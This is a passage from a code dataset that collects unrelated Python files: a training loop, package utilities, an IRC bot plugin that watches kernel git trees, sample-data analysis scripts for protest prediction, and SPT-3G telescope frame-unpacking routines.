valid_losses[key].append(valid_loss[key])\n\n if valid_loss[\"mse\"] < best_loss:\n best_loss = valid_loss[\"mse\"]\n best_model_wts = copy.deepcopy(model.state_dict())\n if epoch % SAVE_INTERVAL == 0:\n torch.save(best_model_wts, save_dir)\n\n time_elapsed = time.time() - since\n print(\"\\nTraining complete in {}m {:0f}s\".format(time_elapsed // 60, time_elapsed % 60))\n print(\"Best val loss: {:.4f}\".format(best_loss))\n\n torch.save(best_model_wts, save_dir)\n return train_losses, valid_losses\n","sub_path":"train/keypoint_train.py","file_name":"keypoint_train.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"356279427","text":"'''\nCreated on Dec 9, 2015\nCopyright (c) 2015\nHarvard Informatics and Scientific Applications\nAll rights reserved.\n\n@author: Aaron Kitzmiller <aaron_kitzmiller@harvard.edu>\n'''\n\ndef getClassFromName(classname):\n '''\n Utility that will return the class object for a full qualified \n classname\n '''\n try:\n parts = classname.split('.')\n module = \".\".join(parts[:-1])\n m = __import__( module )\n for comp in parts[1:]:\n m = getattr(m, comp) \n return m\n except ImportError:\n return None 
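# a module that fails to import is signalled by returning None instead of raising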
\n\nclass UserException(Exception):\n '''\n I can actually get a message from this exception\n '''\n def __init__(self,message):\n super(UserException,self).__init__(message)\n self.user_msg = message \n \n \n__all__ = []\n\nimport pkgutil\nimport inspect\n\nfor loader, name, is_pkg in pkgutil.walk_packages(__path__):\n module = loader.find_module(name).load_module(name)\n\n for name, value in inspect.getmembers(module):\n if name.startswith('__'):\n continue\n\n globals()[name] = value\n __all__.append(name)\n","sub_path":"iggyflow/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"188334525","text":"import os\nfrom djangominimizer import settings\n\ndef get_minimizer_list(file_list, timestamp, ext):\n if not settings.MINIMIZER_DEBUG:\n file_min_list = []\n\n for file_orig in file_list:\n filename = os.path.splitext(file_orig)[0]\n file_min = '%s-%s.%s' % (filename, timestamp, ext)\n file_min_list.append(file_min)\n\n return file_min_list\n\n return file_list\n","sub_path":"djangominimizer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"519521972","text":"# coding=utf-8\n# Copyright 2017 Matt Hart\n# Licensed under the Eiffel Forum License 2\n\nimport requests\nimport subprocess\nimport sys\n\nfrom sopel.config.types import StaticSection, ListAttribute\nfrom sopel.module import interval\nfrom sopel.logger import get_logger\n\nLOG = get_logger(__name__)\n\n\nclass GitTagSection(StaticSection):\n treelist = ListAttribute(\"treelist\")\n allowed_channels = ListAttribute(\"allowed_channels\")\n ignore_branches = ListAttribute(\"ignore_branches\")\n\n\ndef configure(config):\n config.define_section(\"git_tag\", GitTagSection)\n config.git_tag.configure_setting(\n \"treelist\",\n \"Enter your list of trees to monitor ([stable#linux-4.18.y, mainline#master])\",\n )\n\n\ndef setup(bot):\n bot.config.define_section(\"git_tag\", GitTagSection)\n if not bot.config.git_tag.treelist:\n return\n\n\ndef bot_say(bot, text):\n text = \"[GIT] {}\".format(text)\n LOG.info(text)\n for channel in bot.channels:\n if channel in bot.config.git_tag.allowed_channels:\n bot.say(text, channel)\n\n\ndef get_git_tag(text):\n for line in text:\n if line.startswith(\"VERSION\"):\n version = line.split(\"=\")[1].strip()\n if line.startswith(\"PATCHLEVEL\"):\n patchlevel = line.split(\"=\")[1].strip()\n if line.startswith(\"SUBLEVEL\"):\n sublevel = line.split(\"=\")[1].strip()\n if line.startswith(\"EXTRAVERSION\"):\n extraversion = line.split(\"=\")[1].strip()\n return \"v{}.{}.{}{}\".format(version, patchlevel, sublevel, extraversion)\n\n\ndef update_url(bot, url):\n LOG.info(\"Updating for %s\" % url)\n ls_data = subprocess.check_output([\"git\", \"ls-remote\", url, \"refs/heads/*\"])\n ls_data = ls_data.decode(\"utf-8\")\n ls_data = ls_data.strip()\n\n for tree in bot.config.git_tag.treelist:\n t_name, t_url = tree.split(\"#\")\n if url == t_url:\n name = t_name\n break\n\n for head_data in ls_data.split(\"\\n\"):\n head_data = head_data.split(\"\\t\")\n commit = head_data[0]\n branch = head_data[1]\n branch = branch.replace(\"refs/heads/\", \"\")\n treebranch = \"{}#{}\".format(name, branch)\n\n if treebranch in bot.config.git_tag.ignore_branches:\n continue\n\n makefile_url = get_makefile_url(url, commit)\n\n http = requests.get(makefile_url)\n if 
http.status_code == 302 or http.status_code == 404:\n            continue\n        toplines = http.content.decode(\"utf-8\").split(\"\\n\")\n        git_tag = get_git_tag(toplines[:6])\n        git_describe = \"{} ({})\".format(git_tag, commit)\n        if treebranch in bot.memory[\"git_tag\"]:\n            if bot.memory[\"git_tag\"][treebranch] != git_describe:\n                bot_say(bot, \"{} has new version {}\".format(treebranch, git_describe))\n                bot.memory[\"git_tag\"][treebranch] = git_describe\n            else:\n                LOG.info(\n                    \"{} has not changed tag from {}\".format(treebranch, git_describe)\n                )\n        else:\n            LOG.info(\n                \"no tag record for {}, setting to {}\".format(treebranch, git_describe)\n            )\n            bot.memory[\"git_tag\"][treebranch] = git_describe\n\n\ndef get_makefile_url(url, commit):\n    if \"github.com\" in url:\n        github_user, github_project = url.split(\"/\")[3:5]\n        makefile_url = \"https://raw.githubusercontent.com/{}/{}/{}/Makefile\".format(\n            github_user, github_project, commit\n        )\n    else:\n        makefile_url = \"{}/plain/Makefile?h={}\".format(url, commit)\n\n    return makefile_url\n\n\n@interval(120)\ndef xmlrpc_update(bot):\n    if \"git_tag\" not in bot.memory:\n        bot.memory[\"git_tag\"] = {}\n    if \"manifest_fingerprints\" not in bot.memory:\n        bot.memory[\"manifest_fingerprints\"] = {}\n\n    # Fetch new manifest from git.kernel.org\n    manifest_ret = None\n    try:\n        LOG.info(\"Fetching kernel.org manifest\")\n        manifest_ret = subprocess.call(\n            [\n                \"/usr/bin/wget\",\n                \"-qN\",\n                \"-P\",\n                \"/tmp\",\n                \"https://git.kernel.org/manifest.js.gz\",\n            ]\n        )\n    except (FileNotFoundError, subprocess.CalledProcessError):\n        LOG.info(\"Error calling wget. Can't get manifest.js.gz.\")\n\n    # Get the fingerprint for each tree\n    for tree in bot.config.git_tag.treelist:\n        name, url = tree.split(\"#\")\n        if \"https://git.kernel.org/\" in url:\n            # Did we fetch the manifest?\n            if manifest_ret != 0:\n                LOG.info(\"Manifest ret != 0\")\n                continue\n            key = url.replace(\"https://git.kernel.org\", \"\")\n            cmd = \"\"\"zcat /tmp/manifest.js.gz | jq -r '{\"%s\"}[] | .fingerprint'\"\"\" % key\n            fingerprint = subprocess.check_output(cmd, shell=True).decode().strip()\n            LOG.info(\"Fingerprint for %s [%s]\" % (name, fingerprint))\n            if url in bot.memory[\"manifest_fingerprints\"]:\n                LOG.info(\n                    \"Fingerprints in memory for %s: %d\"\n                    % (name, len(bot.memory[\"manifest_fingerprints\"]))\n                )\n                if bot.memory[\"manifest_fingerprints\"][url] != fingerprint:\n                    LOG.info(\n                        \"Fingerprint changed for %s: %s (was %s)\"\n                        % (url, fingerprint, bot.memory[\"manifest_fingerprints\"][url])\n                    )\n                    update_url(bot, url)\n                    bot.memory[\"manifest_fingerprints\"][url] = fingerprint\n            else:\n                LOG.info(\"New fingerprint for %s: %s\" % (url, fingerprint))\n                bot.memory[\"manifest_fingerprints\"][url] = fingerprint\n                update_url(bot, url)\n        else:\n            LOG.info(\"Looking at non-git.kernel.org tree\")\n            update_url(bot, url)\n","sub_path":"git_tag.py","file_name":"git_tag.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"453203402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\nimport json\nimport pandas as pd\nfrom collections import defaultdict\n\n__author__ = \"Tozammel Hossain\"\n__email__ = \"tozammel@isi.edu\"\n\n\ndef show_an_instance(instance):\n    # print(\"Type =\", type(instance))\n    # print(\"Features =\\n\", instance.keys())\n    # 'eventType', 'id', 'protest' (T/F: class var), 'link',\n    # 'location' (list), 'words' (list),\n    # 'date', 'doc2vec' (list), 
'population'\n # print(type(instance['doc2vec']))\n\n print(\"Features:\")\n print('protest =', instance['protest'])\n print('eventType =', instance['eventType'])\n print('id =', instance['id'])\n print('date =', instance['date'])\n print('link =', instance['link'])\n print('population =', instance['population'])\n print('location =', instance['location'])\n print(len(instance['words']))\n print(len(instance['doc2vec']))\n print(\"\")\n\n\ndef explore_sample_data(filepath):\n from collections import defaultdict\n\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n print(\"#lines =\", len(lines))\n\n countries = defaultdict(int)\n class_var = defaultdict(int)\n dates = list()\n\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n country = instance['location'][0]\n countries[country] += 1\n # show_an_instance(instance)\n y = instance['protest']\n class_var[y] += 1\n dates.append(pd.to_datetime(instance['time']).date())\n\n print(countries)\n print(sum(countries.values()))\n print(class_var)\n print(sum(class_var.values()))\n\n\ndef read_lines_as_json(filepath):\n json_list = list()\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n json_list.append(instance)\n return json_list\n\n\ndef create_daily_bags():\n print(\"Creating daily bags...\")\n\n filepath = \"sample-data/news_doc2vec_ar.json\"\n json_list = read_lines_as_json(filepath)\n daily_bags = defaultdict(list)\n\n for json_obj in json_list:\n # print(json_obj['date'])\n date = pd.to_datetime(json_obj['date']).date()\n daily_bags[date].append(json_obj)\n\n print(daily_bags.keys())\n daily_bags_size = {key: len([key]) for key in daily_bags.keys()}\n ts_bags = pd.Series(daily_bags_size)\n print(\"Start date =\", ts_bags.index.min())\n print(\"End date =\", ts_bags.index.max())\n print(\"Min num docs per day =\", ts_bags.min())\n print(\"Max num docs per day =\", ts_bags.max())\n print(ts_bags.head())\n print(ts_bags.tail())\n\n\ndef analyze_sample_traindata():\n # sample training instance\n filepath = \"sample-data/nMIL_lt4_ar/top6cities_realtime_TrainData_2weekshistory.json\"\n json_list = read_lines_as_json(filepath)\n print(\"#entries =\", len(json_list))\n\n pos = 0\n neg = 0\n dates = list()\n for json_obj in json_list:\n # print(json_obj.keys())\n # print(json_obj['time'])\n dates.append(json_obj['time'])\n if json_obj['protest']:\n pos += 1\n print(\"\\tpos, #keys =\", json_obj.keys())\n # print(\"\\tevent type =\", json_obj['eventType'])\n # print(\"\\tpopulation =\", json_obj['population'])\n else:\n neg += 1\n print(\"neg, #keys =\", json_obj.keys())\n\n print(\"#pos =\", pos)\n print(\"#neg =\", neg)\n\n df = pd.DataFrame(dates, columns=['date'])\n ts = df.groupby('date').size()\n print(\"Start date =\", ts.index.min(), \"End date =\", ts.index.max())\n print(\"Min val =\", ts.min(), \"Max val =\", ts.max())\n\n\ndef analyze_sample_news_doc2vec():\n # doc2vec representation\n filepath = \"sample-data/news_doc2vec_ar.json\"\n json_list = read_lines_as_json(filepath)\n\n pos = 0\n neg = 0\n for json_obj in json_list[0:10]:\n print(json_obj.keys())\n if json_obj['protest']:\n pos += 1\n print(\"\\tpos, #keys =\", json_obj.keys())\n print(\"\\tevent type =\", json_obj['eventType'])\n print(\"\\tpopulation =\", json_obj['population'])\n else:\n neg += 1\n print(\"neg, #keys =\", json_obj.keys())\n\n print(\"#pos =\", pos)\n print(\"#neg =\", neg)\n\n\ndef main(argv):\n 
analyze_sample_traindata()\n # analyze_sample_news_doc2vec()\n # create_daily_bags()\n\n\ndef main2(argv):\n filepath = \"sample-data/news_doc2vec_ar.json\"\n \"\"\"\n #rows = 10,384\n countries = {'Argentina': 10384}\n process_happened = {False: 9465, True: 919}\n \"\"\"\n\n from collections import defaultdict\n countries = defaultdict(int)\n class_var = defaultdict(int)\n dates = list()\n\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n print(\"#lines =\", len(lines))\n\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n country = instance['location'][0]\n countries[country] += 1\n # show_an_instance(instance)\n y = instance['protest']\n class_var[y] += 1\n dates.append(pd.to_datetime(instance['date']).date())\n\n print(countries)\n print(sum(countries.values()))\n print(class_var)\n print(sum(class_var.values()))\n\n print(type(dates[0]))\n df = pd.DataFrame(dates, columns=[\"date\"])\n ts = df.groupby(\"date\").size()\n\n print(ts.index.min())\n print(ts.index.max())\n print(ts.min())\n print(ts.max())\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.exit(main(sys.argv))\n","sub_path":"sample_data.py","file_name":"sample_data.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"640242127","text":"import numpy, copy\nfrom spt3g import core\nfrom spt3g.gcp import ACUStatus, ACUState, TrackerStatus, TrackerState, TrackerPointing, CalFile\n\n@core.indexmod\ndef UnitValue(caldict_entry):\n '''Turn unit name into floating point unit value'''\n\n try: \n uname = caldict_entry['UnitName']\n if uname and uname != 'None':\n try:\n if '/' in uname:\n unames = list(filter(None,uname.split('/')))\n uvalue1 = getattr(core.G3Units, \n list(filter(None,unames[0].split(' ')))[0])\n uvalue2 = getattr(core.G3Units, \n list(filter(None,unames[1].split(' ')))[0])\n uvalue = uvalue1 / uvalue2\n else:\n uvalue = getattr(core.G3Units, uname)\n except AttributeError:\n uvalue = 1.\n core.log_warn('No entry in G3Units for ' + uname + '. 
Setting UnitValue to 1.0\\n')\n else:\n uvalue = 1.\n except KeyError:\n uvalue = 1.\n\n return uvalue\n\n\n@core.indexmod\ndef CalibrateFrame(f, calibration_file=None):\n '''Apply gain / offset / units from G3 cal file'''\n \n if f.type != core.G3FrameType.GcpSlow:\n return\n\n try:\n if f['Calibrated'] == True:\n print('Already calibrated!\\n')\n return\n except KeyError:\n f['Calibrated'] = True\n\n cf = CalFile.CalFileReader()\n cd = cf.readCalFile(calibration_file)\n\n for board in f.keys():\n if board == 'Calibrated':\n continue\n cboard = copy.deepcopy(f[board])\n for rmap in cboard.keys():\n for reg in cboard[rmap].keys():\n try: \n rcd = cd[board][rmap][reg]\n except KeyError:\n continue\n rsize = numpy.size(cboard[rmap][reg])\n if rsize > 1:\n rshape = numpy.shape(cboard[rmap][reg])\n if len(rshape) > 1:\n for i in range(rshape[0]):\n try:\n rcdi = rcd[i]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = numpy.asarray(cboard[rmap][reg][i])\n datatemp2 = datatemp.copy()\n # if a register has units, it can't be an\n # int anymore.\n # well, actually, it can't be an int if\n # we're adding floats to it or multiplying\n # it by floats either, so convert\n # everything that has an entry in the cal\n # file to float/double.\n datatemp2 = numpy.asarray(datatemp2,dtype='float64')\n thisdtype = datatemp2.dtype\n datatemp2 += \\\n numpy.array(rcdi['Offset'],dtype=thisdtype)\n datatemp2 *= numpy.array(uvalue / \n rcdi['ReciprocalFactor'],\n dtype=thisdtype)\n if type(cboard[rmap][reg][i]) \\\n is core.G3VectorInt:\n regitemp = core.G3VectorDouble(datatemp2)\n elif type(cboard[rmap][reg][i]) \\\n is core.G3MapInt:\n regitemp = core.G3MapDouble(datatemp2)\n elif type(cboard[rmap][reg][i]) \\\n is core.G3Int:\n regitemp = core.G3Double(datatemp2)\n else:\n regitemp = \\\n (type(cboard[rmap][reg][i]))(datatemp2)\n cboard[rmap][reg][i] = regitemp\n else:\n try:\n rcdi = rcd[0]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = numpy.asarray(cboard[rmap][reg])\n datatemp2 = datatemp.copy()\n # if a register has units, it can't be an\n # int anymore. well, actually (see above)...\n datatemp2 = numpy.asarray(datatemp2,dtype='float64')\n thisdtype = datatemp2.dtype\n datatemp2 += \\\n numpy.array(rcdi['Offset'],dtype=thisdtype)\n datatemp2 *= numpy.array(uvalue / rcdi['ReciprocalFactor'],dtype=thisdtype)\n if type(cboard[rmap][reg]) \\\n is core.G3VectorInt:\n regtemp = core.G3VectorDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3MapInt:\n regtemp = core.G3MapDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3Int:\n regtemp = core.G3Double(datatemp2)\n else:\n regtemp = \\\n (type(cboard[rmap][reg]))(datatemp2)\n cboard[rmap][reg] = regtemp\n else:\n try:\n rcdi = rcd[0]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = cboard[rmap][reg].value\n datatemp2 = datatemp\n # if a register has units, it can't be an\n # int anymore. 
well, actually (see above)...\n                    datatemp2 = float(datatemp2)\n                    datatemp2 = datatemp2 + rcdi['Offset']\n                    datatemp2 *= uvalue / rcdi['ReciprocalFactor']\n                    if type(cboard[rmap][reg]) \\\n                       is core.G3VectorInt:\n                        regtemp = core.G3VectorDouble(datatemp2)\n                    elif type(cboard[rmap][reg]) \\\n                       is core.G3MapInt:\n                        regtemp = core.G3MapDouble(datatemp2)\n                    elif type(cboard[rmap][reg]) \\\n                       is core.G3Int:\n                        regtemp = core.G3Double(datatemp2)\n                    else:\n                        regtemp = \\\n                            (type(cboard[rmap][reg]))(datatemp2)\n                    cboard[rmap][reg] = regtemp\n        del f[board]\n        f[board] = cboard\n\n@core.indexmod\ndef UnpackACUData(f):\n    '''Extracts ACU status information to ACUStatus key in frame'''\n\n    if f.type != core.G3FrameType.GcpSlow:\n        return\n\n    a = ACUStatus()\n    a.time = f['antenna0']['frame']['utc']\n    a.az_pos = f['antenna0']['acu']['az_pos'].value\n    a.el_pos = f['antenna0']['acu']['el_pos'].value\n    a.az_rate = f['antenna0']['acu']['az_rate'].value\n    a.el_rate = f['antenna0']['acu']['el_rate'].value\n\n    # 'new_*' registers not actually filled by GCP; ignore them\n\n    a.px_checksum_error_count = f['antenna0']['acu']['px_checksum_error_count'].value\n    a.px_resync_count = f['antenna0']['acu']['px_resync_count'].value\n    a.px_resync_timeout_count = f['antenna0']['acu']['px_resync_timeout_count'].value\n    a.px_resyncing = f['antenna0']['acu']['px_resyncing'].value\n    a.px_timeout_count = f['antenna0']['acu']['px_timeout_count'].value\n    a.restart_count = f['antenna0']['acu']['restart_count'].value\n\n    a.state = ACUState(f['antenna0']['acu']['state'].value)\n    a.status = f['antenna0']['acu']['acu_status'].value\n    try:\n        a.error = f['antenna0']['acu']['acu_error'].value\n    except KeyError:\n        # This register was added some time in early 2018. In order to read\n        # older data, just set the error code to 0.\n        a.error = 0\n\n    f['ACUStatus'] = a\n\n@core.indexmod\ndef UnpackTrackerMinimal(f, rewrite_source_from_feature_bits=True):\n    '''\n    Construct SourceName and ObservationID keys from frame.\n\n    If rewrite_source_from_feature_bits is True (the default), will try to\n    rewrite source names if DecryptFeatureBit() has been run and either\n    \"elnod\", \"calibrator\", or \"noise\" is present in the feature bit list\n    to that value.\n    '''\n\n    if f.type != core.G3FrameType.GcpSlow:\n        return\n\n    # Grab the GCP source name. 
If it is \"current\", fill in something more\n # helpful from the feature bits if possible.\n source = f['antenna0']['tracker']['source'].value\n if rewrite_source_from_feature_bits and 'GCPFeatureBits' in f:\n if 'elnod' in f['GCPFeatureBits']:\n source = 'elnod'\n if 'calibrator' in f['GCPFeatureBits']:\n source = 'calibrator'\n if 'noise' in f['GCPFeatureBits']:\n source = 'noise'\n if 'debug' in f['GCPFeatureBits']:\n source = 'debug-forced-scanify'\n if 'every_pixel_on_src' in f['GCPFeatureBits']:\n source = source + '-pixelraster' # NB: Do NOT use in-place +=\n f['SourceName'] = source\n\n # And observation ID, if present\n if 'obs_id' in f['antenna0']['tracker']:\n f['ObservationID'] = f['antenna0']['tracker']['obs_id']\n\n@core.indexmod\ndef UnpackTrackerData(f, rewrite_source_from_feature_bits=True):\n '''\n Extracts tracker status information to frame into the TrackerStatus key,\n along with the observation processing handled by UnpackTrackerMinimal.\n\n If rewrite_source_from_feature_bits is True (the default), will try to\n rewrite source names if DecryptFeatureBit() has been run and either\n \"elnod\", \"calibrator\", or \"noise\" is present in the feature bit list\n to that value.\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n UnpackTrackerMinimal(f, rewrite_source_from_feature_bits)\n\n t = TrackerStatus()\n # List comprehensions are due to funny business with G3VectorFrameObject\n t.time = [tm for tm in f['antenna0']['tracker']['utc'][0]]\n\n # Measured values\n t.az_pos = numpy.asarray(f['antenna0']['tracker']['actual'][0])\n t.el_pos = numpy.asarray(f['antenna0']['tracker']['actual'][1])\n # XXX units for rates seem to be wrong. I think this is in encoder counts\n t.az_rate = numpy.asarray(f['antenna0']['tracker']['actual_rates'][0],\n dtype = float)\n t.el_rate = numpy.asarray(f['antenna0']['tracker']['actual_rates'][1],\n dtype = float)\n \n # Expected values\n t.az_command = numpy.asarray(f['antenna0']['tracker']['expected'][0])\n t.el_command = numpy.asarray(f['antenna0']['tracker']['expected'][1])\n t.az_rate_command = numpy.asarray(f['antenna0']['tracker']['expected_rates'][0], dtype = float)\n t.el_rate_command = numpy.asarray(f['antenna0']['tracker']['expected_rates'][1], dtype = float)\n\n # Status params\n if isinstance(f['antenna0']['tracker']['state'][0], core.G3String):\n # If state is all zero (LACKING), for example due to an ACU glitch,\n # the ARC reader may decide that the 8-bit array field is a string.\n # Treat it as one.\n t.state = [TrackerState(0) for s in f['antenna0']['tracker']['inControl'][0]]\n else:\n t.state = [TrackerState(s) for s in f['antenna0']['tracker']['state'][0]]\n t.acu_seq = f['antenna0']['tracker']['acu_seq'][0]\n t.in_control = core.BoolVector(f['antenna0']['tracker']['inControl'][0])\n t.in_control_int = core.IntVector(f['antenna0']['tracker']['inControl'][0])\n t.scan_flag = core.BoolVector(f['antenna0']['tracker']['scan_flag'][0])\n \n t.lst = numpy.asarray(f['antenna0']['tracker']['lst'][0], dtype=float)\n\n t.source_acquired = numpy.asarray(f['antenna0']['tracker']['off_source'][0])\n t.source_acquired_threshold = numpy.asarray(f['antenna0']['tracker']['source_acquired_threshold'])\n t.tracker_mode = numpy.asarray(f['antenna0']['tracker']['mode'][0])\n t.tracker_lacking = numpy.asarray(f['antenna0']['tracker']['lacking'][0])\n t.time_status = numpy.asarray(f['antenna0']['tracker']['time_status'][0])\n try:\n t.schedule_name = numpy.asarray(f['antenna0']['tracker']['schedule_name'].value)\n except 
AttributeError:\n t.schedule_name = numpy.asarray(''.join([chr(x) for x in f['antenna0']['tracker']['schedule_name']]))\n\n f['TrackerStatus'] = t\n\n\n@core.indexmod\ndef UnpackTrackerPointingData(f):\n '''\n Extracts tracker registers relevant to online and offline pointing.\n Calibration values (offsets and multiplicative constants) are from\n gcp/control/conf/spt/cal.\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n t = TrackerPointing()\n t.time = [tm for tm in f['antenna0']['tracker']['utc'][0]]\n t.scu_temp = numpy.asarray(f['antenna0']['scu']['temp'])\n t.features = core.IntVector([f['array']['frame']['features'].value])\n\n t.encoder_off_x = numpy.asarray([f['antenna0']['tracker']['encoder_off'][0]], dtype=numpy.double)\n t.encoder_off_y = numpy.asarray([f['antenna0']['tracker']['encoder_off'][1]], dtype=numpy.double)\n \n t.low_limit_az = numpy.asarray([f['antenna0']['tracker']['az_limits'][0]], dtype=numpy.double)\n t.high_limit_az = numpy.asarray([f['antenna0']['tracker']['az_limits'][1]], dtype=numpy.double)\n t.low_limit_el = numpy.asarray([f['antenna0']['tracker']['el_limits'][0]], dtype=numpy.double)\n t.high_limit_el = numpy.asarray([f['antenna0']['tracker']['el_limits'][1]], dtype=numpy.double)\n\n t.tilts_x = numpy.asarray(f['antenna0']['tracker']['tilt_xy_avg'][0], dtype=numpy.double)\n t.tilts_y = numpy.asarray(f['antenna0']['tracker']['tilt_xy_avg'][1], dtype=numpy.double)\n t.refraction = numpy.asarray(f['antenna0']['tracker']['refraction'][2], dtype=numpy.double)\n\n t.horiz_mount_x = numpy.asarray(f['antenna0']['tracker']['horiz_mount'][0])\n t.horiz_mount_y = numpy.asarray(f['antenna0']['tracker']['horiz_mount'][1])\n t.horiz_off_x = numpy.asarray(f['antenna0']['tracker']['horiz_off'][0])\n t.horiz_off_y = numpy.asarray(f['antenna0']['tracker']['horiz_off'][1])\n\n t.scan_off_x = numpy.asarray(f['antenna0']['tracker']['scan_off'][0])\n t.scan_off_y = numpy.asarray(f['antenna0']['tracker']['scan_off'][1])\n t.sky_off_x = numpy.asarray(f['antenna0']['tracker']['sky_xy_off'][0])\n t.sky_off_y = numpy.asarray(f['antenna0']['tracker']['sky_xy_off'][1])\n t.equat_off_x = numpy.asarray(f['antenna0']['tracker']['equat_off'][0])\n t.equat_off_y = numpy.asarray(f['antenna0']['tracker']['equat_off'][1])\n\n t.equat_geoc_ra = numpy.asarray(f['antenna0']['tracker']['equat_geoc'][0])\n t.equat_geoc_dec = numpy.asarray(f['antenna0']['tracker']['equat_geoc'][1])\n t.horiz_topo_az = numpy.asarray(f['antenna0']['tracker']['horiz_topo'][0])\n t.horiz_topo_el = numpy.asarray(f['antenna0']['tracker']['horiz_topo'][1])\n\n t.error_az = numpy.asarray(f['antenna0']['tracker']['errors'][0])\n t.error_el = numpy.asarray(f['antenna0']['tracker']['errors'][1])\n\n t.linsens_avg_l1 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][0])\n t.linsens_avg_l2 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][1])\n t.linsens_avg_r1 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][2])\n t.linsens_avg_r2 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][3])\n \n t.telescope_temp = numpy.asarray([f['array']['weather']['airTemperature'].value])\n t.telescope_pressure = numpy.asarray([f['array']['weather']['pressure'].value])\n\n f['TrackerPointing'] = t\n\n p = core.G3MapVectorDouble()\n p['tilts'] = numpy.asarray(f['antenna0']['tracker']['tilts'], dtype=numpy.double)\n p['flexure'] = numpy.asarray(f['antenna0']['tracker']['flexure'], dtype=numpy.double)\n p['fixedCollimation'] = numpy.asarray(f['antenna0']['tracker']['fixedCollimation'], 
dtype=numpy.double)\n p['time'] = numpy.asarray(t.time, dtype=numpy.double)\n\n f['OnlinePointingModel'] = p\n\n@core.indexmod\ndef DecryptFeatureBit(f):\n '''\n Unpacks the GCP feature flags\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n flag_array = core.G3VectorString()\n feature_bit = f['array']['frame']['features'].value\n\n flags = ['analyze', 'source_scan', 'cabin_shutter', 'elnod', 'pol_cal',\n 'calibrator', 'every_pixel_on_src', 'skydip', 'optical', 'noise',\n 'trail', 'el_scan', None, None, None, None, None, None, None,\n 'debug']\n # Sorry... NDH\n\n for i in enumerate(flags):\n if feature_bit & (1 << i[0]):\n if i[1] is None:\n core.log_error('Got an unused feature bit: {:d}'.format(i[0]))\n flag_array.append(i[1])\n\n f['GCPFeatureBits'] = flag_array\n\n@core.indexmod\ndef AddBenchData(f):\n '''\n Add the optical bench positions to the frame.\n '''\n if f.type != core.G3FrameType.GcpSlow:\n return\n bench_axes = ['y1', 'y2', 'y3', 'x4', 'x5', 'z6']\n\n benchcom = core.G3TimestreamMap()\n benchpos = core.G3TimestreamMap()\n benchzero = core.G3TimestreamMap()\n benchoff = core.G3TimestreamMap()\n bencherr = core.G3TimestreamMap()\n bench_info = core.G3TimestreamMap()\n for i, key in enumerate(bench_axes):\n # As of 2017-08-03, SCU time is not trustworthy\n # start = f['antenna0']['scu']['benchSampleTime'][0][0]\n # stop = f['antenna0']['scu']['benchSampleTime'][0][-1]\n # For now, do this bit of evil\n start = f['antenna0']['tracker']['utc'][0][0]\n stop = f['antenna0']['tracker']['utc'][0][-1]\n\n benchcom[key] = core.G3Timestream(f['antenna0']['scu']['benchExpected'][i])\n benchcom[key].start = start\n benchcom[key].stop = stop\n\n benchpos[key] = core.G3Timestream(f['antenna0']['scu']['benchActual'][i])\n benchpos[key].start = start\n benchpos[key].stop = stop\n\n benchzero[key] = core.G3Timestream(f['antenna0']['scu']['benchZeros'][i])\n benchzero[key].start = start\n benchzero[key].stop = stop\n\n benchoff[key] = core.G3Timestream(f['antenna0']['scu']['benchOffsets'][i])\n benchoff[key].start = start\n benchoff[key].stop = stop\n\n bencherr[key] = core.G3Timestream(f['antenna0']['scu']['benchErrors'][i])\n bencherr[key].start = start\n bencherr[key].stop = stop\n\n info_items = ['benchFocus', 'benchDeadBand', 'benchAcquiredThreshold',\n 'benchPrimaryState', 'benchSecondaryState', \n 'benchFault', 'timeLocked']\n bench_info = core.G3TimestreamMap()\n for i, key in enumerate(info_items):\n start = f['antenna0']['tracker']['utc'][0][0]\n stop = f['antenna0']['tracker']['utc'][0][-1]\n\n bench_info[key] = core.G3Timestream(f['antenna0']['scu'][key][0])\n bench_info[key].start = start\n bench_info[key].stop = stop\n\n f['BenchPosition'] = benchpos\n f['BenchCommandedPosition'] = benchcom\n f['BenchZeros'] = benchzero\n f['BenchOffsets'] = benchoff\n f['BenchErrors'] = bencherr\n f['BenchInfo'] = bench_info\n f['BenchSampleTime'] = f['antenna0']['scu']['benchSampleTime'][0]\n \n@core.indexmod\ndef UnpackCryoData(f):\n '''\n Extracts cryo information into CryoStatus key\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'cryo' not in f['array']:\n return\n\n t = core.G3MapDouble()\n t.time = f['array']['cryo']['utc']\n t.cryo_is_valid = f['array']['cryo']['cryoIsValid'][0]\n\n # Measured values\n # He10\n t.uc_head = f['array']['cryo']['temperature'][0][0]\n t.ic_head = 